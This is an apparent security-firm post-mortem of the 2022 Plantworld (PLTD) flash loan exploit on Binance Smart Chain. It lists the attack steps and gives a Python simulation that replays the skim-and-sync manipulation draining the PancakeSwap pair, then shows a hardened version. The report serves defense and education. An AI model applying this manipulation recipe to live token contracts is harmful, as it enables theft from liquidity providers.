Plantworld’s Flash Loan Attack Analysis Report

TL;DR

On October 18, 2022, Plantworld ($PLTD) became the latest victim of a flash loan attack. A flaw in the token's transfer logic allowed the attacker to manipulate the PLTD balance of the token's PancakeSwap pair, resulting in a profit of 24,475 $BUSD for the hacker.

Introduction to Plantworld

Plantworld (PLTD) is a plant-themed blockchain game whose token is a BEP-20 token on Binance Smart Chain (BSC).

Vulnerability Assessment

The root cause of this vulnerability is that the PLTD token contract directly manipulates the PLTD balance of its own Cake-LP pair from inside its transfer logic. Funded by a flash loan, the attacker was able to exploit this to reduce the pair's PLTD balance to 1, have the pair sync its reserves to that value, and then swap the $PLTD held by the attack contract for almost all of the $BUSD in the pair.

Steps

  1. The attacker address and the attack transaction can be looked up on BscScan.

  2. The hacker took out two flash loans to borrow a total of 666,000 $BUSD.

  3. The attacker then swapped all 666,000 $BUSD for about 1.57 million $PLTD. At this point the attacker held a large amount of PLTD, which is later used to manipulate the PLTD balance of the Cake-LP pair.

  4. As a pre-attack check, the attacker read the current _bron value and the PLTD balance of Cake-LP.

  5. The attacker sent 116,000 $PLTD directly to Cake-LP, an amount chosen to be exactly twice the pair's PLTD balance from the previous step minus one, i.e. 2 × (balance − 1).

  6. This call goes through transfer and then _transfer. Here the from address is the attack contract, the to address is the pair, takeFee is set to true, and _tokenTransferSell is invoked.

  7. _tokenTransferSell sets _bron to half of the transferred amount, which is exactly the pair's PLTD balance minus 1.

  8. The attacker calls skim on Cake-LP to pull back the PLTD just transferred (the amount held above the recorded reserve). Because the from address of this transfer is uniswapV2Pair, _transfer now takes the _tokenTransferBuy path.

  9. _tokenTransferBuy deducts _bron (the pair balance minus 1) from the pair's PLTD balance, leaving the pair with exactly 1 PLTD, and then calls the pair's sync function so that the reserve is updated to that value.

  10. With the PLTD reserve at 1, the attacker swapped all of their $PLTD for $BUSD, nearly draining the BUSD side of Cake-LP.

Aftermath

The perpetrator obtained approximately 690,000 $BUSD from the final swap and repaid the 666,000 $BUSD borrowed through the flash loans. The remaining profit of approximately 24,475 $BUSD was sent to another address.

How to prevent such an attack vector

The absence of a protocol security audit can have catastrophic consequences for any crypto-native project. It is essential that the codebase be subjected to stringent auditing procedures to protect against incidents of this kind.

More specifically, a token contract should never reach into the balance of its own liquidity pair, or call the pair's sync function, from its transfer logic. That coupling is what allowed the attacker to set the pair's PLTD reserve to an arbitrary value, and it should be removed from the token contract outright rather than guarded with additional conditions.
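The mechanism in the Steps above, and why the fix is to decouple the token from its pair, can be reproduced with a small model. The following Python is an added example written for this page; it is not the PLTD contract or PancakeSwap code. The token hooks (_tokenTransferSell storing half the amount in _bron, _tokenTransferBuy removing _bron from the pair's balance and calling sync) are reconstructed from the description above, the burn of the deducted tokens and the 0.25% swap fee are assumptions, the token's fee-on-transfer logic and the flash-loan fee are omitted, and the pool sizes are constructed to land close to the figures reported in this post. Passing vulnerable=False gives a plain BEP-20 that never touches the pair, which is the hardened behaviour recommended above.

```python
"""Constructed model of the PLTD pair-balance manipulation (not the real contract)."""

FEE_BPS = 25                      # assumed PancakeSwap-v2 swap fee, 0.25%
PAIR, ATTACKER = "Cake-LP", "attack-contract"


def amount_out(amount_in, reserve_in, reserve_out):
    """Constant-product output with the fee taken from the input (UniswapV2-style)."""
    fee_in = amount_in * (10_000 - FEE_BPS)
    return reserve_out * fee_in // (reserve_in * 10_000 + fee_in)


class Token:
    """PLTD-like BEP-20 token. Hook behaviour reconstructed from the write-up:
    a sell (to == pair) stores amount/2 in _bron; a buy (from == pair) removes
    _bron from the pair's balance (modelled as a burn, an assumption) and syncs.
    With vulnerable=False the token is a plain BEP-20 that never touches the pair."""

    def __init__(self, balances, vulnerable):
        self.balances = dict(balances)
        self.vulnerable = vulnerable
        self.pair = None            # wired up once the Pair exists
        self._bron = 0

    def transfer(self, frm, to, amount):          # stands in for _transfer
        if not 0 < amount <= self.balances.get(frm, 0):
            raise ValueError("insufficient balance")
        self.balances[frm] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount
        if not self.vulnerable:
            return
        if to == PAIR:                            # _tokenTransferSell
            self._bron = amount // 2
        elif frm == PAIR and 0 < self._bron < self.balances[PAIR]:   # _tokenTransferBuy
            self.balances[PAIR] -= self._bron     # pair balance shrinks by _bron
            self.pair.sync()                      # reserve now equals the shrunken balance


class Pair:
    """Minimal PancakeSwap-v2-like pair: token0 = PLTD (held in Token), token1 = BUSD."""

    def __init__(self, token, busd):
        self.token, self.busd = token, busd
        token.pair = self
        self.sync()

    def sync(self):
        self.reserve_pltd = self.token.balances[PAIR]
        self.reserve_busd = self.busd

    def skim(self, to):
        """Send the PLTD held above the recorded reserve to `to` (BUSD side omitted)."""
        self.token.transfer(PAIR, to, self.token.balances[PAIR] - self.reserve_pltd)

    def _check_k(self, pltd_in, busd_in):
        adj_pltd = self.token.balances[PAIR] * 10_000 - pltd_in * FEE_BPS
        adj_busd = self.busd * 10_000 - busd_in * FEE_BPS
        if adj_pltd * adj_busd < self.reserve_pltd * self.reserve_busd * 10_000 ** 2:
            raise ValueError("K invariant violated")

    def buy_pltd(self, busd_in, to):
        out = amount_out(busd_in, self.reserve_busd, self.reserve_pltd)
        self.busd += busd_in
        self.token.transfer(PAIR, to, out)        # from == pair: the buy hook fires
        self._check_k(0, busd_in)
        self.sync()
        return out

    def sell_pltd(self):
        """Caller has already transferred PLTD in; input = balance - reserve."""
        pltd_in = self.token.balances[PAIR] - self.reserve_pltd
        out = amount_out(pltd_in, self.reserve_pltd, self.reserve_busd)
        self.busd -= out
        self._check_k(pltd_in, 0)
        self.sync()
        return out


def run_attack(vulnerable, pool_pltd=1_628_001, pool_busd=24_600, loan=666_000):
    """Replay the steps from the write-up; pool sizes are constructed, not on-chain data."""
    token = Token({PAIR: pool_pltd, ATTACKER: 0}, vulnerable)
    pair = Pair(token, pool_busd)

    pltd_bought = pair.buy_pltd(loan, ATTACKER)          # flash-loaned BUSD -> PLTD
    bal = token.balances[PAIR]                           # read the pair's PLTD balance
    token.transfer(ATTACKER, PAIR, 2 * (bal - 1))        # sell hook sets _bron = bal - 1
    pair.skim(ATTACKER)                                  # buy hook removes _bron, syncs
    pair_after_skim = token.balances[PAIR]               # 1 on the vulnerable token

    token.transfer(ATTACKER, PAIR, token.balances[ATTACKER])   # sell everything
    busd_out = pair.sell_pltd()
    return {"pltd_bought": pltd_bought, "pair_pltd_after_skim": pair_after_skim,
            "busd_out": busd_out, "profit": busd_out - loan}   # flash-loan fee omitted


if __name__ == "__main__":
    for flag in (True, False):
        print("vulnerable" if flag else "hardened", run_attack(flag))
```

With the vulnerable hooks the skim leaves the pair holding exactly 1 PLTD, the synced reserve makes the pair's own K check pass, and the final sell returns roughly the whole BUSD side, so the attacker clears the loan with a profit of about 24,600 $BUSD in this constructed pool. With the hooks removed the identical sequence just round-trips the pool and loses the swap fees, which is the point of the recommendation above.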

Protocol, and Platform Security

Our security team at Neptune Mutual can validate your platform for DNS and web-based security, smart contract reviews, as well as frontend and backend security. We can offer you a solution to scan your platform and safeguard your protocol for known and unknown vulnerabilities that have the potential to have catastrophic long-term effects. Contact us on social media if you are serious about security and have the budget, desire, and feeling of responsibility to do so.


About Us

Neptune Mutual project safeguards the Ethereum community from cyber threats. The protocol uses parametric cover as opposed to discretionary insurance. It has an easy and reliable on-chain claim process. This means that when incidents are confirmed by our community, resolution is fast.

Join us in our mission to cover, protect, and secure on-chain digital assets.

Official Website: https://neptunemutual.com
Blog: https://blog.neptunemutual.com/
Twitter: https://twitter.com/neptunemutual
Reddit: https://www.reddit.com/r/NeptuneMutual
Telegram: https://t.me/neptunemutual
Discord: https://discord.gg/2qMGTtJtnW
YouTube: https://www.youtube.com/c/NeptuneMutual
LinkedIn: https://www.linkedin.com/company/neptune-mutual
